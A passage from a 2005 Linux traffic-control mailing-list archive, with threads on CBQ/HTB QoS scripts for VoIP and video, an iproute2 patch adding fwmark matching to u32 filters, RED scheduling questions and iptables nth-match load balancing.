(i.e. dear customer, here is your 128kbps line, do what you want). What can I do with HTB is to shape incoming and traffic separately (somehow to virtually split=20 the line for upload/download with limited speeds), but this is not the way I would like it to be, since=20 would like to get the line used as effective as possible. Maybe something like IMQ would work, but unfortunately I have found no example for that solution. Any ideas? Jan Rovner From rsenykoff@harrislogic.com Wed Jan 5 20:41:50 2005 From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com) Date: Wed, 5 Jan 2005 14:41:50 -0600 Subject: [LARTC] Best QoS Policy for VoIP Message-ID: This is a multipart message in MIME format. --=_alternative 0071B18086256F80_= Content-Type: text/plain; charset="US-ASCII" Hello all, I've got a couple redundant (Spanning Tree Protocol) boxes running FC1 minimal install + bridge-utils and they are working great for QoS + ntop monitoring. I'm wondering if I should handle the VoIP traffic a little differently. I don't mind letting VoIP and Video lend out traffic when it isn't being used, so that's why I gave them such large chunks of the bandwidth. Especially the video, which is only used sometimes, and even then it only usually needs around 400 / 400. It seems that CBQ is pretty good just because I can vary the bounded / isolated stuff. For example, Citrix is isolated and always gets that bandwidth. Video and VoIP are bounded, but not isolated. Sametime is a instant messaging client. Here's my script (have 2 scripts, both the same except that one is for eth0, the other for eth1. Also, we have 3Mb / 3Mb connection. #!/bin/sh ##################################### ############ VARIABLES ############## # # e=eth0 # interface t1=2.40Mbit # size of your WAN - remember you can't max this or you'll experience latency. 75-80% of max is a good place to start. el=100Mbit # size of eth0 w=0.24Mbit # weighting of your WAN (10% of t1) sizeCitrix=0.4Mbit sizeVoIP=0.8Mbit sizeVideo=1.0Mbit sizeBulk=0.1Mbit sizeSametime=0.1Mbit weightCitrix=0.04Mbit weightVoIP=0.08Mbit weightVideo=0.1Mbit weightBulk=0.01Mbit weightSametime=0.01Mbit CONNECTRIA1="XXX.XXX.XXX.XXX" CONNECTRIA2="XXX.XXX.XXX.XXX" SAMETIME="XXX.XXX.XXX.XXX" # # ##################################### ##################################### # Delete any old rules # tc qdisc del root dev $e ## each class is able to take more bandwidth as it is available, but must ## surrender it as the higher priorities (2, 3, then 4) need it. ## The lower the priority number, the more priority it gets. Thus when ## there is extra bandwidth available, the lower number classes get it as ## they need it. # root qdisc / qdisc = queueing discipline # tc qdisc add dev $e root handle 1:0 cbq bandwidth 100Mbit avpkt 1000 cell 8 tc class add dev $e parent 1:0 classid 1:1 cbq bandwidth 100Mbit rate $t1 weight $w prio 8 allot 1514 cell 8 maxburst 20 avpkt 1000 bounded # child qdiscs (like child nodes on a tree) # tc class add dev $e parent 1:1 classid 1:3 cbq bandwidth 100Mbit rate $sizeCitrix weight $weightCitrix prio 8 allot 1514 cell 8 maxburst 20 avpkt 300 isolated tc qdisc add dev $e parent 1:3 handle 30: sfq perturb 20 tc class add dev $e parent 1:1 classid 1:5 cbq bandwidth 100Mbit rate $sizeVoIP weight $weightVoIP prio 8 allot 1514 cell 8 maxburst 20 avpkt 204 bounded tc class add dev $e parent 1:1 classid 1:6 cbq bandwidth 100Mbit rate $sizeVideo weight $weightVideo prio 8 allot 1514 cell 8 maxburst 20 avpkt 580 bounded tc class add dev $e parent 1:1 classid 1:7 cbq bandwidth 100Mbit rate $sizeSametime weight $weightSametime prio 8 allot 1514 cell 8 maxburst 20 avpkt 550 tc qdisc add dev $e parent 1:7 handle 70: sfq perturb 20 tc class add dev $e parent 1:1 classid 1:9 cbq bandwidth 100Mbit rate $sizeBulk weight $weightBulk prio 8 allot 1514 cell 8 maxburst 20 avpkt 1000 tc qdisc add dev $e parent 1:9 handle 90: sfq perturb 20 ##################################### ############### Citrix ############## # # # SSH # tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 22 0xffff flowid 1:3 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 22 0xffff flowid 1:3 # CITRIX/ICA # tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 1494 0xffff flowid 1:3 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 1494 0xffff flowid 1:3 # CITRIX Metaframe # tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $CONNECTRIA1/32 flowid 1:3 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $CONNECTRIA1/32 flowid 1:3 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $CONNECTRIA2/32 flowid 1:3 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $CONNECTRIA2/32 flowid 1:3 ##################################### ############### VoIP ################ # # # IAX # this is the old format - IAX2 should be what's really seen going on tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 5036 0xffff flowid 1:5 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 5036 0xffff flowid 1:5 # IAX2 # tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 4569 0xffff flowid 1:5 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 4569 0xffff flowid 1:5 #### Remotely VPNd SIP Phones ##### # Ron Senykoff Home tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src XXX.XXX.XXX.XXX/32 flowid 1:5 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst XXX.XXX.XXX.XXX/32 flowid 1:5 ##################################### ############### Video ############### # # # H323 # tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 1720 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 1720 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15328 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15328 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15329 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15329 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15330 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15330 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15331 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15331 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15332 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15332 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 3230 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 3230 0xffff flowid 1:6 . . shortened for posting purposes . . tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 3247 0xffff flowid 1:6 tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 3247 0xffff flowid 1:6 ##################################### ############ Sametime ############### # # tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $SAMETIME/32 flowid 1:7 tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $SAMETIME/32 flowid 1:7 ##################################### ######### Bulk / Default ############ # # tc filter add dev $e protocol ip parent 1:0 prio 3 u32 match ip src 0.0.0.0/0 flowid 1:9 tc filter add dev $e protocol ip parent 1:0 prio 3 u32 match ip dst 0.0.0.0/0 flowid 1:9 --=_alternative 0071B18086256F80_= Content-Type: text/html; charset="US-ASCII"
Hello all,

I've got a couple redundant (Spanning Tree Protocol) boxes running FC1 minimal install + bridge-utils and they are working great for QoS + ntop monitoring. I'm wondering if I should handle the VoIP traffic a little differently. I don't mind letting VoIP and Video lend out traffic when it isn't being used, so that's why I gave them such large chunks of the bandwidth. Especially the video, which is only used sometimes, and even then it only usually needs around 400 / 400. It seems that CBQ is pretty good just because I can vary the bounded / isolated stuff. For example, Citrix is isolated and always gets that bandwidth. Video and VoIP are bounded, but not isolated. Sametime is a instant messaging client. Here's my script (have 2 scripts, both the same except that one is for eth0, the other for eth1. Also, we have 3Mb / 3Mb connection.

#!/bin/sh
#####################################
############ VARIABLES ##############
#                                   #
e=eth0       # interface
t1=2.40Mbit  # size of your WAN - remember you can't max this or you'll experience latency. 75-80% of max is a good place to start.
el=100Mbit   # size of eth0
w=0.24Mbit   # weighting of your WAN (10% of t1)

sizeCitrix=0.4Mbit
sizeVoIP=0.8Mbit
sizeVideo=1.0Mbit
sizeBulk=0.1Mbit
sizeSametime=0.1Mbit

weightCitrix=0.04Mbit
weightVoIP=0.08Mbit
weightVideo=0.1Mbit
weightBulk=0.01Mbit
weightSametime=0.01Mbit

CONNECTRIA1="XXX.XXX.XXX.XXX"
CONNECTRIA2="XXX.XXX.XXX.XXX"
SAMETIME="XXX.XXX.XXX.XXX"

#                                   #
#####################################
#####################################

# Delete any old rules #
tc qdisc del root dev $e

## each class is able to take more bandwidth as it is available, but must
## surrender it as the higher priorities (2, 3, then 4) need it.
## The lower the priority number, the more priority it gets. Thus when
## there is extra bandwidth available, the lower number classes get it as
## they need it.

# root qdisc /  qdisc = queueing discipline #
tc qdisc add dev $e root handle 1:0 cbq bandwidth 100Mbit avpkt 1000 cell 8

tc class add dev $e parent 1:0 classid 1:1 cbq bandwidth 100Mbit rate $t1 weight $w prio 8 allot 1514 cell 8 maxburst 20 avpkt 1000 bounded

# child qdiscs (like child nodes on a tree) #
tc class add dev $e parent 1:1 classid 1:3 cbq bandwidth 100Mbit rate $sizeCitrix weight $weightCitrix prio 8 allot 1514 cell 8 maxburst 20 avpkt 300 isolated
tc qdisc add dev $e parent 1:3 handle 30: sfq perturb 20

tc class add dev $e parent 1:1 classid 1:5 cbq bandwidth 100Mbit rate $sizeVoIP weight $weightVoIP prio 8 allot 1514 cell 8 maxburst 20 avpkt 204 bounded

tc class add dev $e parent 1:1 classid 1:6 cbq bandwidth 100Mbit rate $sizeVideo weight $weightVideo prio 8 allot 1514 cell 8 maxburst 20 avpkt 580 bounded

tc class add dev $e parent 1:1 classid 1:7 cbq bandwidth 100Mbit rate $sizeSametime weight $weightSametime prio 8 allot 1514 cell 8 maxburst 20 avpkt 550
tc qdisc add dev $e parent 1:7 handle 70: sfq perturb 20

tc class add dev $e parent 1:1 classid 1:9 cbq bandwidth 100Mbit rate $sizeBulk weight $weightBulk prio 8 allot 1514 cell 8 maxburst 20 avpkt 1000
tc qdisc add dev $e parent 1:9 handle 90: sfq perturb 20

#####################################
############### Citrix ##############
#                                   #

# SSH #
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 22 0xffff flowid 1:3
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 22 0xffff flowid 1:3

# CITRIX/ICA #
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 1494 0xffff flowid 1:3
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 1494 0xffff flowid 1:3

# CITRIX Metaframe #
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $CONNECTRIA1/32 flowid 1:3
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $CONNECTRIA1/32 flowid 1:3

tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $CONNECTRIA2/32 flowid 1:3
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $CONNECTRIA2/32 flowid 1:3

#####################################
############### VoIP ################
#                                   #

# IAX # this is the old format - IAX2 should be what's really seen going on
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 5036 0xffff flowid 1:5
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 5036 0xffff flowid 1:5

# IAX2 #
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 4569 0xffff flowid 1:5
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 4569 0xffff flowid 1:5

#### Remotely VPNd SIP Phones   #####

# Ron Senykoff Home
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src XXX.XXX.XXX.XXX/32 flowid 1:5
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst XXX.XXX.XXX.XXX/32 flowid 1:5

#####################################
############### Video ###############
#                                   #

# H323 #
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 1720 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 1720 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15328 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15328 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15329 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15329 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15330 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15330 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15331 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15331 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15332 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15332 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 3230 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 3230 0xffff flowid 1:6
.
. shortened for posting purposes
.
.
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 3247 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 3247 0xffff flowid 1:6

#####################################
############ Sametime ###############
#                                   #

tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $SAMETIME/32 flowid 1:7
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $SAMETIME/32 flowid 1:7

#####################################
######### Bulk / Default ############
#                                   #

tc filter add dev $e protocol ip parent 1:0 prio 3 u32 match ip src 0.0.0.0/0 flowid 1:9
tc filter add dev $e protocol ip parent 1:0 prio 3 u32 match ip dst 0.0.0.0/0 flowid 1:9


--=_alternative 0071B18086256F80_=-- From Plaxo Contact Update for Jeffrey Schaper" This is a multi-part message in MIME format. --_-------==2479006865 Content-Type: multipart/alternative; boundary="_--=======2921805862" --_--=======2921805862 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit lartc@mailman.ds9a.nl, I'm updating my address book. Please take a moment to update your latest contact information. Your information is stored in my personal address book and will not be shared with anyone else. Plaxo is free, if you'd like to give it a try. Click the following link to correct or confirm your information: https://www.plaxo.com/edit_contact_info?r=21475339810-28737444--1616415207 Name: lartc@mailman.ds9a.nl Job Title: Company: Work E-mail: lartc@mailman.ds9a.nl Work Phone: Work Fax: Work Address Line 1: Work Address Line 2: Work City, State, Zip: Mobile Phone: Home E-mail: Home Phone: Home Fax: Home Address Line 1: Home Address Line 2: Home City, State, Zip: Birthday: P.S. I've included my Plaxo card below so that you have my current information. I've also attached a copy as a vCard. +----------------- | Jeffrey Schaper | jschaper@online.net.pg | Managing Director | | Infra_Serve Ltd | P. O. Box 1284 | Waigani | NCD PNG | work: (675) 3230959 | fax: (675) 3230982 | mobile: (675) 6871506 +------------------------------------- ____________________________________________________________ This message was sent to you by jschaper@online.net.pg via Plaxo. To opt out: https://www.plaxo.com/opt_out?r=21475339810-28737444--1616415207 Plaxo's Privacy Policy: http://www.plaxo.com/support/privacy --_--=======2921805862 Content-Type: text/html; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit Your Contact Info

lartc@mailman.ds9a.nl,

I'm updating my address book. Please take a moment to update your latest contact information. Your information is stored in my personal address book and will not be shared with anyone else. Plaxo is free, if you'd like to give it a try.

Thanks,
Jeffrey Schaper

 
Click the button below to change or confirm your info
lartc@mailman.ds9a.nl
no title
 no company
 no work address
 


lartc@mailman.ds9a.nl
no web page
IM: none
work: none
fax: none
mobile: none
pager: none
 

P.S. I've attached my current information in a vcard. If you get Plaxo too, we'll stay in touch automatically.

If you do not wish to receive update request emails from Jeffrey Schaper, click here to opt-out.

--_--=======2921805862-- --_-------==2479006865 Content-Type: text/x-vcard; charset=ISO-8859-1; name="Jeffrey Schaper.vcf" Content-Transfer-Encoding: 8bit Content-Disposition: attachment; filename="Jeffrey Schaper.vcf" BEGIN:VCARD VERSION:2.1 X-PLAXO-VERSION:1.0 N:Schaper;Jeffrey;;; FN:Jeffrey Schaper ORG:Infra_Serve Ltd TITLE:Managing Director ADR;WORK;ENCODING=QUOTED-PRINTABLE:;;P. O. Box 1284=0D=0AWaigani;NCD;PNG;; TEL;WORK;VOICE:(675) 3230959 TEL;CELL;VOICE:(675) 6871506 TEL;WORK;FAX:(675) 3230982 EMAIL;PREF;INTERNET;WORK:jschaper@online.net.pg END:VCARD --_-------==2479006865-- From shemminger@osdl.org Wed Jan 5 23:44:56 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Wed, 5 Jan 2005 15:44:56 -0800 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DC00E0.2070300@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> Message-ID: <20050105154456.38b6838a@dxpl.pdx.osdl.net> On Wed, 05 Jan 2005 14:59:44 +0000 Andy Furniss wrote: > Catalin(ux aka Dino) BOIE wrote: > > Hello, Stephen, List! > > > > Attached is the patch for iproute2 to add the possibility to use fwmark > > in u32 filters. > > The kernel part was included in 2.6.10. > > > > Please apply! > > Thank you! > > > > For more info: > > - Kernel patch (not needed for 2.6.10): > > http://kernel.umbrella.ro/net/mark_in_u32/net-match-nfmark-in-u32.patch > > > > - Examples: > > http://kernel.umbrella.ro/net/mark_in_u32/examples.txt > > > > --- > > Catalin(ux aka Dino) BOIE > > catab at deuroconsult.ro > > http://kernel.umbrella.ro/ > > That looks handy :-) Do you know why fw mark doesn't work with policers > in 2.6 (assuming it's not just me) > > To stephen - I may be wrong here but in the readme it says that default > kernel include is /usr/src/linux/include but if I grep for > KERNEL_INCLUDE I see :- > > ./Makefile:KERNEL_INCLUDE:=/usr/include > ./Makefile:CFLAGS = $(CCOPTS) -I$(KERNEL_INCLUDE) -I../include $(DEFINES) > ./Makefile: ./configure $(KERNEL_INCLUDE) > ./README:KERNEL_INCLUDE should point to correct linux kernel include > directory. I changed away from Alexey's old KERNEL_INCLUDE, because it was necessary for the package to be able to be compiled without depending on the kernel header files. There were cases where new features needed to be compiled on old systems where the definition was missing. Think about building current iproute2 util's with 2.4.20 includes. The current solution (though less than ideal) was to put stripped down version of the routing specific includes into the iproute2 package. From Zhenyu Wu" Jonathan, Yes, I think you are right, RED can be applied to any qdisc. The "RED" you mentioned here is the RED algorithm, right? I know, in linux kernel (sch_red.c), which implements the RED algotithm, just indeed uses a FIFO queue, do you think so? So, if there are serveral RED qdiscs which attach to different classes, a scheduling mechanism is needed, right? If what i have said is right, it seems that there are no scheduler mechanisms for serveral FIFO qdiscs(or RED qdiscs) in linux kernel. Of course, as we can see, CBQ which can be regard as a scheduling queue also has a scheduler mechanisms WRR. But if the FIFO is attached to the CBQ classes, then, when CBQ schedule different queues(FIFOs) using WRR, will the packets in different queues are scheduled in turn? In another condition, if i add a scheduling mechanism such as WRR behind all FIFOs, i can use this mechnism to shedule the packets in different queues, are there are any difference? Thank you very much! Regards, Zhenyu Wu >I may be wrong on this, but I believe that RED can be > attached to any queueing system, including the basic > FIFO queues. In a sense, you're still using a > scheduling system, when using the default arrangement, > it's just a first-come, first-served one. > > RED is classless and applies to the whole of a queue. > What that queue is attached to, if I understand it > correctly, isn't important. It can be a class, but it > can just as easily be everything going through that > device. > > Again, someone correct me if I'm wrong, but as I > understand it, there are four levels to the whole > QoS/diffserv concept. > > One of these levels is the queueing discipline. This > can be something like CBQ, WFQ, FIFO, PRIO, or > whatever. This is how the data is organized, it does > not describe how the data is sent. In the case of > something like CBQ, you have a defined set of queues > in parallel, with rules as to what packets fall into > what queue. On the other hand, queueing schemes such > as FIFO are flat. There's a single queue that > everything goes through, though there may be different > rules for how things get pushed to it. > > Another level is the scheduling mechanism. This > describes how the data is sent, once organized, but > does not describe the organization itself. If you've > only one queue, then there's really not much to > schedule. If you've multiple queues, then it's fairly > normal to use "round robin" or "weighted round robin" > to pick which queue to pull a packet from. Linux' CBQ > uses "weighted round robin", according to the C file. > > The next level is the packet dropping mechanism. When > queues flood, packets are going to be dropped. There's > nowhere to store them. I'm pretty sure the default > behaviour is to simply continue accepting packets, but > to drop any that expire before being sent or which > fall off the end of the queue (if the queue is > bounded). RED, GRED, and a whole host of similar > mechanisms, try to drop packets in a more controlled > manner. However, that is really all they do. > > Finally, there are mechanisms for damping overly > active applications, such as ECN. The idea here is > that if you throttle back whatever is generating > excess traffic, you don't get the problems assoicated > with dealing with it. The "default" behaviour is to do > nothing. > > When setting up QoS - on Linux or anything else - you > basically pick one of each of the four categories to > assemble a packet delivery system. Even without QoS, > you're doing that, you're just using the defaults in > all cases. The mechanisms are still going to be there. > > The Linux configuration menu does NOT match the above > terminology, or the terminology in the source code. > Thus, the source code identifies CBQ as a queueing > discipline, but the configuration menu calls it a > scheduler. The QoS help is also not very helpful, as > it mostly tells people to look at the source. However, > if you look at the source for CBQ or RED, for example, > the explanation is relative to the cited papers, so > you then have to go and read those before coming back > and doing anything. > > This is one area I hope is going to get resolved in > the reasonably near future. If not, I might have to > come up with a patch myself. The very thought of that > should send shivers down the spines of any kernel > developers out there. > > Jonathan > > --- Zhenyu Wu wrote: > > > Thank you very much, i will try to find these papers > > which must be very helpful > > for me. The "more" means that whether there are > > other mechanisms not only for > > Linux. Sorry, i have not make it clear! Sometimes, i > > wonder whether the qdiscs > > such as CBQ, RED, GRED ... are belong to the > > scheduler mechanisms in linux > > enviroment. For example, In Red, which i can find > > are enqueue, and dequeue.... so, > > if i add a RED qidsc to a class, must i add a > > scheduler mechanism so that i can > > decide which packet in the queues will be scheduled > > and put to the link? > > > > Good luck, > > Best, > > > > > __________________________________ > Do you Yahoo!? > The all-new My Yahoo! - What will yours do? > http://my.yahoo.com > From andy.furniss@dsl.pipex.com Thu Jan 6 08:53:41 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 06 Jan 2005 08:53:41 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <20050105154456.38b6838a@dxpl.pdx.osdl.net> References: <41DC00E0.2070300@dsl.pipex.com> <20050105154456.38b6838a@dxpl.pdx.osdl.net> Message-ID: <41DCFC95.20207@dsl.pipex.com> Stephen Hemminger wrote: > On Wed, 05 Jan 2005 14:59:44 +0000 > Andy Furniss wrote: > > >>Catalin(ux aka Dino) BOIE wrote: >> >>>Hello, Stephen, List! >>> >>>Attached is the patch for iproute2 to add the possibility to use fwmark >>>in u32 filters. >>>The kernel part was included in 2.6.10. >>> >>>Please apply! >>>Thank you! >>> >>>For more info: >>>- Kernel patch (not needed for 2.6.10): >>>http://kernel.umbrella.ro/net/mark_in_u32/net-match-nfmark-in-u32.patch >>> >>>- Examples: >>>http://kernel.umbrella.ro/net/mark_in_u32/examples.txt >>> >>>--- >>>Catalin(ux aka Dino) BOIE >>>catab at deuroconsult.ro >>>http://kernel.umbrella.ro/ >> >>That looks handy :-) Do you know why fw mark doesn't work with policers >>in 2.6 (assuming it's not just me) >> >>To stephen - I may be wrong here but in the readme it says that default >>kernel include is /usr/src/linux/include but if I grep for >>KERNEL_INCLUDE I see :- >> >>./Makefile:KERNEL_INCLUDE:=/usr/include >>./Makefile:CFLAGS = $(CCOPTS) -I$(KERNEL_INCLUDE) -I../include $(DEFINES) >>./Makefile: ./configure $(KERNEL_INCLUDE) >>./README:KERNEL_INCLUDE should point to correct linux kernel include >>directory. > > > I changed away from Alexey's old KERNEL_INCLUDE, because it was necessary > for the package to be able to be compiled without depending on the kernel > header files. There were cases where new features needed to be compiled on > old systems where the definition was missing. Think about building current > iproute2 util's with 2.4.20 includes. > > The current solution (though less than ideal) was to put stripped down > version of the routing specific includes into the iproute2 package. > Ahh I see, thanks for the explanation. Andy. From andy.furniss@dsl.pipex.com Thu Jan 6 09:00:23 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 06 Jan 2005 09:00:23 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DC1880.6090405@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> Message-ID: <41DCFE27.4030704@dsl.pipex.com> Andy Furniss wrote: > Thomas Graf wrote: >> >> Do you see the police/action stats being updated? i.e. does >> the matching itself work? > > > From memory yes - counters showed OK on iptables and tc -s qdisc ls dev > eth0 just no drops > > I'll repeat tonight to be sure. I retried with a vanilla 2.6.10 + iptables 1.2.11 on a different box and it is the same. The only difference between working and not working cases when using tc -s qdisc ls dev eth0 is the drops count. The stats are OK apart from that. Andy. From jan.rovner@diadema.cz Thu Jan 6 09:30:54 2005 From: jan.rovner@diadema.cz (Jan Rovner) Date: Thu, 6 Jan 2005 10:30:54 +0100 Subject: [LARTC] Shaping the sum of in/out traffic (IMQ?) Message-ID: Hello, does anyone have a working solution for the shaping both incoming and outgoing traffic in such way, that for a given class the sum of incoming and outgoing traffic is specified? My ISP does the same thing, it gives me just a line of a defined rate, no matter the traffic direction (i.e. here is the line, the clock speed is 1024kbps, do what you want). I'm a litte bit familiar with HTB on Linux, my download shaping works fine. However, I would like to shape both incoming+outgoing traffic in a way that the sum of actual outgoing and incoming rates of all classes=20 would be always below the ISP's line speed in order to shaping get working. In other words, I would like to split the ISP's line into a bunch of hierarchical "virtual" lines with traffic borrowing and other features like HTB does for download, but with total (in+out) rates. Maybe something like IMQ would work, but unfortunately I have found no example for that situation. Any ideas? Jan Rovner _______________________________________________ LARTC mailing list / LARTC@mailman.ds9a.nl http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From andy.furniss@dsl.pipex.com Thu Jan 6 09:44:25 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 06 Jan 2005 09:44:25 +0000 Subject: [LARTC] Load Balance Outbound AND Inbound Internet Traffic to one location over multiple links In-Reply-To: References: <41C97943.3000003@dsl.pipex.com> <41CF1920.6040307@dsl.pipex.com> Message-ID: <41DD0879.7040307@dsl.pipex.com> Joe Nuts wrote: > Thanks again for the response, Andy. > I've done a tremendous amount of research, and set-up to test the > multi-link ppp, and I still have not been successful in my search. > The problem i've found out from working with ppp, and pppoe, is that I > can only create a ppp connection between two devices on the same > broadcast network. I.E. two devices connected by some kind of bridged > ethernet. > This wouldnt be an option for me, because the DSL connections to the > client make it to the ISP over an ATM line, directly to a router. The > router plugs in to a layer-2 switch, which then our server plugs in > to. > I would need to create maybe a GRE tunnel from the client to the > server, so that the pppoe client requests would make it to the server, > to then create the ppp connection. > > And that's just to get the one connection going, i'd like to be able > to multilink multiple connections. > > If there were some way to multilink gre (or IPIP) tunnels, to get > combined bandwith on single connections, that would be ideal. But I > have not found any solutions along those lines. > My next attempts will be multilink pppoe tunnels over gre tunnels, and > I'm also researching what BSD has to offer in that arena. > > Any suggestions are welcome. I don't know whether you can link tunnels or not. Another way you could look into is doing it at IP level using the netfilter patch Nth. You could just round robin packets over the links - not as nice as multilink as packet size isn't accounted for, but may be OK in practise. Below is the help for it - You may not need to do the NAT but AIUI you could use it to mark and then route using the marks. Andy. Author: Fabrice MARIE Status: Works For Me. This option adds CONFIG_IP_NF_MATCH_NTH, which supplies a match module that will allow you to match every Nth packet encountered. By default there are 16 different counters that can be used. This match functions in one of two ways 1) Match ever Nth packet, and only the Nth packet. example: iptables -t mangle -A PREROUTING -m nth --every 10 -j DROP This rule will drop every 10th packet. 2) Unique rule for every packet. This is an easy and quick method to produce load-balancing for both inbound and outbound. example: iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 0 -j SNAT --to-source 10.0.0.5 iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 1 -j SNAT --to-source 10.0.0.6 iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 2 -j SNAT --to-source 10.0.0.7 This example evenly splits connections between the three SNAT addresses. By using the mangle table and iproute2, you can setup complex load-balanced routing. There's lot of other uses. Be creative! Suppported options are: --every Nth Match every Nth packet [--counter] num Use counter 0-15 (default:0) [--start] num Initialize the counter at the number 'num' instead of 0. Must be between 0 and Nth-1 [--packet] num Match on 'num' packet. Must be between 0 and Nth-1. If --packet is used for a counter than there must be Nth number of --packet rules, covering all values between 0 and Nth-1 inclusively. From tgraf@suug.ch Thu Jan 6 09:50:09 2005 From: tgraf@suug.ch (Thomas Graf) Date: Thu, 6 Jan 2005 10:50:09 +0100 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DCFE27.4030704@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> Message-ID: <20050106095009.GU26856@postel.suug.ch> * Andy Furniss <41DCFE27.4030704@dsl.pipex.com> 2005-01-06 09:00 > I retried with a vanilla 2.6.10 + iptables 1.2.11 on a different box and > it is the same. 2 options: 1) get latest -bk snapshot and apply http://people.suug.ch/~tgr/patches/pending/ The patchset fixes a 